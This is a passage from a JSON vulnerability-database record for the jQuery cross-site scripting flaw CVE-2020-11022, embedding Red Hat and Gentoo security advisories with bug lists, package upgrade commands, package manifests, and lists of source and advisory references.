web and mobile applications. Description:\n\nRed Hat Identity Management (IdM) is a centralized authentication, identity\nmanagement, and authorization solution for both traditional and cloud-based\nenterprise environments. Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1430365 - [RFE] Host-group names command rename\n1488732 - fake_mname in named.conf is no longer effective\n1585020 - Enable compat tree to provide information about AD users and groups on trust agents\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1651577 - [WebUI] IPA Error 3007: RequirmentError\" while adding members in \"User ID overrides\" tab\n1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute\n1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1701233 - [RFE] support setting supported signature methods on the token\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1746830 - Memory leak during search of idview overrides\n1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch\n1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming\n1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn\u0027t work in GUI (it works only from CLI)\n1759888 - Rebase OpenDNSSEC to 2.1\n1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED\n1777806 - When Service weight is set as 0 for server in IPA location \"IPA Error 903: InternalError\" is displayed\n1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service\n1801698 - [RFE] Changing default hostgroup is too easy\n1802471 - SELinux policy for ipa-custodia\n1809835 - RFE: ipa group-add-member: number of failed should also be emphasized\n1810154 - RFE: ipa-backup should compare locally and globally installed server roles\n1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time\n1813330 - ipa-restore does not restart httpd\n1816784 - KRA install fails if all KRA members are Hidden Replicas\n1818765 - [Rebase] Rebase ipa to 4.8.6+\n1818877 - [Rebase] Rebase to softhsm 2.6.0+\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831732 - AVC avc: denied { dac_override } for comm=\"ods-enforcerd\n1831935 - AD authentication with IdM against SQL Server\n1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11\n1833266 - [dirsrv] set \u0027nsslapd-enable-upgrade-hash: off\u0027 as this raises warnings\n1834264 - BIND rebase: rebuild against new so version\n1834909 - softhsm use-after-free on process exit\n1845211 - Rebase bind-dyndb-ldap to 11.3\n1845537 - IPA bind configuration issue\n1845596 - ipa trust-add fails with \u0027Fetching domains from trusted forest failed\u0027\n1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts\n1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7\n1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn\n1849914 - FreeIPA - Utilize 256-bit AJP connector passwords\n1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition\n1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2\n1853263 - ipa-selinux package missing\n1857157 - replica install failing with avc denial for custodia component\n1858318 - AttributeError: module \u0027ssl\u0027 has no attribute \u0027SSLCertVerificationError\u0027 when upgrading ca-less ipa master\n1859213 - AVC denial during ipa-adtrust-install --add-agents\n1863079 - ipa-epn command displays \u0027exception: ConnectionRefusedError: [Errno 111] Connection refused\u0027\n1863616 - CA-less install does not set required permissions on KDC certificate\n1866291 - EPN: enhance input validation\n1866938 - ipa-epn fails to retrieve user data if some user attributes are not present\n1868432 - Unhandled Python exception in \u0027/usr/libexec/ipa/ipa-pki-retrieve-key\u0027\n1869311 - ipa trust-add fails with \u0027Fetching domains from trusted forest failed\u0027\n1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less\n1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain\n1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. \n1879604 - pkispawn logs files are empty\n\n6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202007-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/ \u003chttps://security.gentoo.org/\u003e\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Cacti: Multiple vulnerabilities\n Date: July 26, 2020\n Bugs: #728678, #732522\n ID: 202007-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Cacti, the worst of which\ncould result in the arbitrary execution of code. \n\nBackground\n==========\n\nCacti is a complete frontend to rrdtool. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-analyzer/cacti \u003c 1.2.13 \u003e= 1.2.13\n 2 net-analyzer/cacti-spine\n \u003c 1.2.13 \u003e= 1.2.13\n -------------------------------------------------------------------\n 2 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Cacti. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Cacti users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-analyzer/cacti-1.2.13\"\n\nAll Cacti Spine users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=net-analyzer/cacti-spine-1.2.13\"\n\nReferences\n==========\n\n[ 1 ] CVE-2020-11022\n https://nvd.nist.gov/vuln/detail/CVE-2020-11022 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11022\u003e\n[ 2 ] CVE-2020-11023\n https://nvd.nist.gov/vuln/detail/CVE-2020-11023 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11023\u003e\n[ 3 ] CVE-2020-14295\n https://nvd.nist.gov/vuln/detail/CVE-2020-14295 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-14295\u003e\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202007-03 \u003chttps://security.gentoo.org/glsa/202007-03\u003e\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org \u003cmailto:security@gentoo.org\u003e or alternatively, you may file a bug at\nhttps://bugs.gentoo.org \u003chttps://bugs.gentoo.org/\u003e. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5 \u003chttps://creativecommons.org/licenses/by-sa/2.5\u003e\n\n. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. Solution:\n\nBefore applying this update, ensure all previously released errata relevant\nto your system is applied. \n\nSee the following documentation, which will be updated shortly for release\n3.11.219, for important instructions on how to upgrade your cluster and\nfully\napply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_r\nelease_notes.html\n\nThis update is available via the Red Hat Network. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Red Hat Virtualization security, bug fix, and enhancement update\nAdvisory ID: RHSA-2020:3807-01\nProduct: Red Hat Virtualization\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3807\nIssue date: 2020-09-23\nCVE Names: CVE-2020-8203 CVE-2020-11022 CVE-2020-11023\n CVE-2020-14333\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat Virtualization Engine 4.4. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch\n\n3. Description:\n\nThe org.ovirt.engine-root is a core component of oVirt. \n\nThe following packages have been upgraded to a later upstream version:\nansible-runner-service (1.0.5), org.ovirt.engine-root (4.4.2.3),\novirt-engine-dwh (4.4.2.1), ovirt-engine-extension-aaa-ldap (1.4.1),\novirt-engine-ui-extensions (1.2.3), ovirt-log-collector (4.4.3),\novirt-web-ui (1.6.4), rhvm-branding-rhv (4.4.5), rhvm-dependencies (4.4.1),\nvdsm-jsonrpc-java (1.5.5). (BZ#1674420, BZ#1866734)\n\nA list of bugs fixed in this update is available in the Technical Notes\nbook:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/ht\nml-single/technical_notes\n\nSecurity Fix(es):\n\n* nodejs-lodash: prototype pollution in zipObjectDeep function\n(CVE-2020-8203)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* jQuery: passing HTML containing \u003coption\u003e elements to manipulation methods\ncould result in untrusted code execution (CVE-2020-11023)\n\n* ovirt-engine: Reflected cross site scripting vulnerability\n(CVE-2020-14333)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* Cannot assign direct LUN from FC storage - grayed out (BZ#1625499)\n\n* VM portal always asks how to open console.vv even it has been set to\ndefault application. (BZ#1638217)\n\n* RESTAPI Not able to remove the QoS from a disk profile (BZ#1643520)\n\n* On OVA import, qemu-img fails to write to NFS storage domain (BZ#1748879)\n\n* Possible missing block path for a SCSI host device needs to be handled in\nthe UI (BZ#1801206)\n\n* Scheduling Memory calculation disregards huge-pages (BZ#1804037)\n\n* Engine does not reduce scheduling memory when a VM with dynamic hugepages\nruns. (BZ#1804046)\n\n* In Admin Portal, \"Huge Pages (size: amount)\" needs to be clarified\n(BZ#1806339)\n\n* Refresh LUN is using host from different Data Center to scan the LUN\n(BZ#1838051)\n\n* Unable to create Windows VM\u0027s with Mozilla Firefox version 74.0.1 and\ngreater for RHV-M GUI/Webadmin portal (BZ#1843234)\n\n* [RHV-CNV] - NPE when creating new VM in cnv cluster (BZ#1854488)\n\n* [CNV\u0026RHV] Add-Disk operation failed to complete. (BZ#1855377)\n\n* Cannot create KubeVirt VM as a normal user (BZ#1859460)\n\n* Welcome page - remove Metrics Store links and update \"Insights Guide\"\nlink (BZ#1866466)\n\n* [RHV 4.4] Change in CPU model name after RHVH upgrade (BZ#1869209)\n\n* VM vm-name is down with error. Exit message: unsupported configuration:\nCan\u0027t add USB input device. USB bus is disabled. (BZ#1871235)\n\n* spec_ctrl host feature not detected (BZ#1875609)\n\nEnhancement(s):\n\n* [RFE] API for changed blocks/sectors for a disk for incremental backup\nusage (BZ#1139877)\n\n* [RFE] Improve workflow for storage migration of VMs with multiple disks\n(BZ#1749803)\n\n* [RFE] Move the Remove VM button to the drop down menu when viewing\ndetails such as snapshots (BZ#1763812)\n\n* [RFE] enhance search filter for Storage Domains with free argument\n(BZ#1819260)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1625499 - Cannot assign direct LUN from FC storage - grayed out\n1638217 - VM portal always asks how to open console.vv even it has been set to default application. \n1643520 - RESTAPI Not able to remove the QoS from a disk profile\n1674420 - [RFE] - add support for Cascadelake-Server CPUs (and IvyBridge)\n1748879 - On OVA import, qemu-img fails to write to NFS storage domain\n1749803 - [RFE] Improve workflow for storage migration of VMs with multiple disks\n1758024 - Long running Ansible tasks timeout and abort for RHV-H hosts with STIG/Security Profiles applied\n1763812 - [RFE] Move the Remove VM button to the drop down menu when viewing details such as snapshots\n1778471 - Using more than one asterisk in LDAP search string is not working when searching for AD users. \n1787854 - RHV: Updating/reinstall a host which is part of affinity labels is removed from the affinity label. \n1801206 - Possible missing block path for a SCSI host device needs to be handled in the UI\n1803856 - [Scale] ovirt-vmconsole takes too long or times out in a 500+ VM environment. \n1804037 - Scheduling Memory calculation disregards huge-pages\n1804046 - Engine does not reduce scheduling memory when a VM with dynamic hugepages runs. \n1806339 - In Admin Portal, \"Huge Pages (size: amount)\" needs to be clarified\n1816951 - [CNV\u0026RHV] CNV VM migration failure is not handled correctly by the engine\n1819260 - [RFE] enhance search filter for Storage Domains with free argument\n1826255 - [CNV\u0026RHV]Change name of type of provider - CNV -\u003e OpenShift Virtualization\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831949 - RESTAPI javadoc contains missing information about assigning IP address to NIC\n1831952 - RESTAPI contains malformed link around JSON representation fo the cluster\n1831954 - RESTAPI javadoc contains malformed link around oVirt guest agent\n1831956 - RESTAPI javadoc contains malformed link around time zone representation\n1838051 - Refresh LUN is using host from different Data Center to scan the LUN\n1841112 - not able to upload vm from OVA when there are 2 OVA from the same vm in same directory\n1843234 - Unable to create Windows VM\u0027s with Mozilla Firefox version 74.0.1 and greater for RHV-M GUI/Webadmin portal\n1850004 - CVE-2020-11023 jQuery: passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1854488 - [RHV-CNV] - NPE when creating new VM in cnv cluster\n1855377 - [CNV\u0026RHV] Add-Disk operation failed to complete. \n1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function\n1858184 - CVE-2020-14333 ovirt-engine: Reflected cross site scripting vulnerability\n1859460 - Cannot create KubeVirt VM as a normal user\n1860907 - Upgrade bundled GWT to 2.9.0\n1866466 - Welcome page - remove Metrics Store links and update \"Insights Guide\" link\n1866734 - [DWH] Rebase bug - for the 4.4.2 release\n1869209 - [RHV 4.4] Change in CPU model name after RHVH upgrade\n1869302 - ansible 2.9.12 - host deploy fixes\n1871235 - VM vm-name is down with error. Exit message: unsupported configuration: Can\u0027t add USB input device. USB bus is disabled. \n1875609 - spec_ctrl host feature not detected\n1875851 - Web Admin interface broken on Firefox ESR 68.11\n\n6. Package List:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:\n\nSource:\nansible-runner-service-1.0.5-1.el8ev.src.rpm\novirt-engine-4.4.2.3-0.6.el8ev.src.rpm\novirt-engine-dwh-4.4.2.1-1.el8ev.src.rpm\novirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.src.rpm\novirt-engine-ui-extensions-1.2.3-1.el8ev.src.rpm\novirt-log-collector-4.4.3-1.el8ev.src.rpm\novirt-web-ui-1.6.4-1.el8ev.src.rpm\nrhvm-branding-rhv-4.4.5-1.el8ev.src.rpm\nrhvm-dependencies-4.4.1-1.el8ev.src.rpm\nvdsm-jsonrpc-java-1.5.5-1.el8ev.src.rpm\n\nnoarch:\nansible-runner-service-1.0.5-1.el8ev.noarch.rpm\novirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-backend-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-dbscripts-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-dwh-4.4.2.1-1.el8ev.noarch.rpm\novirt-engine-dwh-grafana-integration-setup-4.4.2.1-1.el8ev.noarch.rpm\novirt-engine-dwh-setup-4.4.2.1-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-setup-1.4.1-1.el8ev.noarch.rpm\novirt-engine-health-check-bundler-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-restapi-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-base-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-cinderlib-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-imageio-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-common-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-tools-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-tools-backup-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-ui-extensions-1.2.3-1.el8ev.noarch.rpm\novirt-engine-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-webadmin-portal-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-log-collector-4.4.3-1.el8ev.noarch.rpm\novirt-web-ui-1.6.4-1.el8ev.noarch.rpm\npython3-ovirt-engine-lib-4.4.2.3-0.6.el8ev.noarch.rpm\nrhvm-4.4.2.3-0.6.el8ev.noarch.rpm\nrhvm-branding-rhv-4.4.5-1.el8ev.noarch.rpm\nrhvm-dependencies-4.4.1-1.el8ev.noarch.rpm\nvdsm-jsonrpc-java-1.5.5-1.el8ev.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-8203\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/cve/CVE-2020-11023\nhttps://access.redhat.com/security/cve/CVE-2020-14333\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX2t0HtzjgjWX9erEAQhpWg/+KolNmhmQCrst8TmYsC2IgSdHP+q0LKLj\ngdPZYu0ixOpwLLiAhrsoDXqL3H3w7UDSKkSISgPMEqEde4Vp+zI37O1q3E/P7CAj\nrfLGuL1UDEiy0q0g1BP13GrPlg6K4fR5wQAnTB6vD/ZY+wd50Z0T+NGAxd2w68bM\nR5q1kSOUPc4AZt25FORU2cmp775Y7DWazMWHC77uiJHgyCwVqLtdO09iEnglZDKJ\nBynwyT8exZKXxmmpE4QZ4X7wNo3Y0mTiRZo5eyxxQpwj9X+qw1V+pBdtMH/C1yhk\nJ+X1f+wDoe2jCx2bqPXqp6EgFSHnJNt96jV0oTdD0f8rMgWcBDStNXdagPBmBCBp\nt+Kq3BZx0Oqkig4f+DCEmoS0V0fB9UQLg0Q/M9p1bTfYQkbn+BMHL7CAp8UyAzPH\nA1HlnP7TtQgplFvoap82xt2pXh97VvI6x3sBGHyW4Fz0SykhRYx3dAgmqy5nEssl\n5ApWZ87M3l+2tUh4ZOJAtzRDt9sL5KQsXjp1jZaK/gWBsL4Suzr9AIrs4NmRmXnY\nTzxdXgIY6C+dWmB4TPhcJE5etcvtorqvs93d47yBdpRyO/IlbEw0vLUBdVZZuj9N\nmqp6RcHqDKm6Yv4B73Ud5my44wSRWVWtBxO6fivQOQG7iqCyIlA3M3LUMkVy+fxc\nbvmOI0eIsZw=Jhpi\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11022"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11022",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "162159",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2021-02",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2020-10",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2020-11",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2021-10",
"trust": 1.2
},
{
"db": "ICS CERT",
"id": "ICSA-22-055-02",
"trust": 0.9
},
{
"db": "JVN",
"id": "JVNVU99843134",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94912830",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94847990",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94973485",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-25-182-07",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-22-342-02",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-22-097-01",
"trust": 0.8
},
{
"db": "CERT@VDE",
"id": "VDE-2021-027",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "171212",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171215",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159852",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159876",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159275",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "157850",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158555",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170823",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171214",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160274",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170821",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159353",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161727",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170819",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168304",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170817",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158750",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159513",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2429",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163559",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-11022",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"id": "VAR-202004-2191",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:54:02.528000Z",
"patch": {
"_id": null,
"data": [
{
"title": "hitachi-sec-2020-130",
"trust": 0.8,
"url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 3.11 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202217 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-4693-1 drupal7 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=978f239ce60a8a08c53eb64ba189d0f6"
},
{
"title": "Red Hat: Moderate: Red Hat AMQ Interconnect 1.9.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204211 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Virtualization security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203807 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Service Mesh security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202362 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7.4-1 - RHEL7 Container",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205249 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: wordpress: WordPress 5.9.2 security and maintenance release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=e7014c0a68e8d9bc31a54125059176dc"
},
{
"title": "Red Hat: Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226393 - Security Advisory"
},
{
"title": "Red Hat: Moderate: ipa security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203936 - Security Advisory"
},
{
"title": "Red Hat: Important: RHV Manager (ovirt-engine) 4.4 security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203247 - Security Advisory"
},
{
"title": "Red Hat: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204670 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.4.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202813 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Nessus 8.13.0 Fixes One Third-party Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2020-10"
},
{
"title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=0c6e8f969487f201b1d56f59bd98f443"
},
{
"title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=e57a04f097f54c762da82263eadc1b8a"
},
{
"title": "Red Hat: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204847 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Nessus Network Monitor 5.13.0 Fixes One Third-party Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2021-02"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230556 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230554 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Tenable.sc 5.17.0 Fixes Multiple Vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2020-11"
},
{
"title": "Amazon Linux 2: ALAS2-2020-1519",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2020-1519"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Common Services",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2020-130"
},
{
